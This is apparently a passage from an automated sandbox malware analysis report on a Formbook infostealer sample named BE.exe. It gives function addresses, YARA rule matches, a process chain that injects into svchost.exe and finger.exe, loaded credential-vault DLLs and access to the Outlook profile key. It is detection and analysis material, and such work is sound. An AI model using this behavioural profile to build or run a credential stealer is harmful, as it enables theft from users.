Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FFB76 2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DDAAC 2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03985AA0 2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039E1AA3 2_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039EDAC6 2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FFA49 2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F7A46 2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B3A6C 2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D5910 2_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03949950 2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395B950 2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039438E0 2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AD800 2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03941F92 2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FFFB1 2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03903FD2 2_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03903FD5 2_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FFF09 2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03949EB0 2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395FDC0 2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F1D5A 2_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03943D40 2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F7D73 2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FFCF2 2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B9C32 2_2_039B9C32
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D002C0 4_2_02D002C0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D20274 4_2_02D20274
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D403E6 4_2_02D403E6
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C8E3F0 4_2_02C8E3F0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3A352 4_2_02D3A352
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D12000 4_2_02D12000
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D381CC 4_2_02D381CC
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D341A2 4_2_02D341A2
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D401AA 4_2_02D401AA
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D08158 4_2_02D08158
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C70100 4_2_02C70100
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D1A118 4_2_02D1A118
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C9C6E0 4_2_02C9C6E0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C7C7C0 4_2_02C7C7C0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CA4750 4_2_02CA4750
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C80770 4_2_02C80770
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D2E4F6 4_2_02D2E4F6
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D32446 4_2_02D32446
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D24420 4_2_02D24420
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D40591 4_2_02D40591
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C80535 4_2_02C80535
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C7EA80 4_2_02C7EA80
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D36BD7 4_2_02D36BD7
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3AB40 4_2_02D3AB40
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CAE8F0 4_2_02CAE8F0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C668B8 4_2_02C668B8
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C8A840 4_2_02C8A840
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C82840 4_2_02C82840
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C829A0 4_2_02C829A0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D4A9A6 4_2_02D4A9A6
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C96962 4_2_02C96962
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3EEDB 4_2_02D3EEDB
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3CE93 4_2_02D3CE93
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C92E90 4_2_02C92E90
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C80E59 4_2_02C80E59
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3EE26 4_2_02D3EE26
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C72FC8 4_2_02C72FC8
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C8CFE0 4_2_02C8CFE0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CFEFA0 4_2_02CFEFA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CF4F40 4_2_02CF4F40
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D22F30 4_2_02D22F30
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CC2F28 4_2_02CC2F28
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CA0F30 4_2_02CA0F30
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C70CF2 4_2_02C70CF2
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D20CB5 4_2_02D20CB5
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C80C00 4_2_02C80C00
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C7ADE0 4_2_02C7ADE0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C98DBF 4_2_02C98DBF
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C8AD00 4_2_02C8AD00
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D1CD1F 4_2_02D1CD1F
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C9B2C0 4_2_02C9B2C0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D212ED 4_2_02D212ED
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C852A0 4_2_02C852A0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CC739A 4_2_02CC739A
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C6D34C 4_2_02C6D34C
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3132D 4_2_02D3132D
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C870C0 4_2_02C870C0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D2F0CC 4_2_02D2F0CC
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3F0E0 4_2_02D3F0E0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D370E9 4_2_02D370E9
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C8B1B0 4_2_02C8B1B0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CB516C 4_2_02CB516C
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C6F172 4_2_02C6F172
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D4B16B 4_2_02D4B16B
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D316CC 4_2_02D316CC
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CC5630 4_2_02CC5630
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3F7B0 4_2_02D3F7B0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C71460 4_2_02C71460
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3F43F 4_2_02D3F43F
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D495C3 4_2_02D495C3
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D1D5B0 4_2_02D1D5B0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D37571 4_2_02D37571
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D2DAC6 4_2_02D2DAC6
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CC5AA0 4_2_02CC5AA0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D21AA3 4_2_02D21AA3
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D1DAAC 4_2_02D1DAAC
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D37A46 4_2_02D37A46
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3FA49 4_2_02D3FA49
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CF3A6C 4_2_02CF3A6C
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CBDBF9 4_2_02CBDBF9
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CF5BF0 4_2_02CF5BF0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C9FB80 4_2_02C9FB80
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3FB76 4_2_02D3FB76
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C838E0 4_2_02C838E0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CED800 4_2_02CED800
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C89950 4_2_02C89950
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C9B950 4_2_02C9B950
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D15910 4_2_02D15910
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C89EB0 4_2_02C89EB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C43FD5 4_2_02C43FD5
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C43FD2 4_2_02C43FD2
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C81F92 4_2_02C81F92
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3FFB1 4_2_02D3FFB1
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3FF09 4_2_02D3FF09
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D3FCF2 4_2_02D3FCF2
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02CF9C32 4_2_02CF9C32
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C9FDC0 4_2_02C9FDC0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02C83D40 4_2_02C83D40
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D31D5A 4_2_02D31D5A
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02D37D73 4_2_02D37D73
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00432EB0 4_2_00432EB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0042E0A0 4_2_0042E0A0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0042C120 4_2_0042C120
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_00434650 4_2_00434650
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0044AED0 4_2_0044AED0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0042DE7C 4_2_0042DE7C
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0042DE80 4_2_0042DE80
Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02C6B970 appears 280 times
Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02CFF290 appears 105 times
Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02CB5130 appears 58 times
Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02CC7E54 appears 111 times
Source: C:\Windows\SysWOW64\finger.exe Code function: String function: 02CEEA12 appears 86 times
Source: C:\Users\user\Desktop\BE.exe Code function: String function: 00389CB3 appears 31 times
Source: C:\Users\user\Desktop\BE.exe Code function: String function: 003A0A30 appears 46 times
Source: C:\Users\user\Desktop\BE.exe Code function: String function: 0039F9F2 appears 40 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03987E54 appears 111 times
Source: BE.exe, 00000000.00000003.2066498171.00000000037E3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BE.exe
Source: BE.exe, 00000000.00000003.2084669007.000000000398D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BE.exe
Source: BE.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/14
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F37B5 GetLastError,FormatMessageW, 0_2_003F37B5
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E10BF AdjustTokenPrivileges,CloseHandle, 0_2_003E10BF
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_003E16C3
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_003F51CD
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_0040A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0040A67C
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_003F648E
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_003842A2
Source: C:\Users\user\Desktop\BE.exe File created: C:\Users\user\AppData\Local\Temp\aut3E7F.tmp Jump to behavior
Source: BE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: finger.exe, 00000004.00000002.4522971094.0000000000681000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2444956493.0000000000681000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.000000000068B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BE.exe Virustotal: Detection: 38%
Source: BE.exe ReversingLabs: Detection: 55%
Source: unknown Process created: C:\Users\user\Desktop\BE.exe "C:\Users\user\Desktop\BE.exe"
Source: C:\Users\user\Desktop\BE.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BE.exe"
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BE.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BE.exe" Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe" Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: BE.exe Static file information: File size 1270272 > 1048576
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: BE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: finger.pdb source: svchost.exe, 00000002.00000002.2260567408.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260582343.0000000003212000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523226545.0000000001588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148577940.00000000003AE000.00000002.00000001.01000000.00000004.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2328613444.00000000003AE000.00000002.00000001.01000000.00000004.sdmp
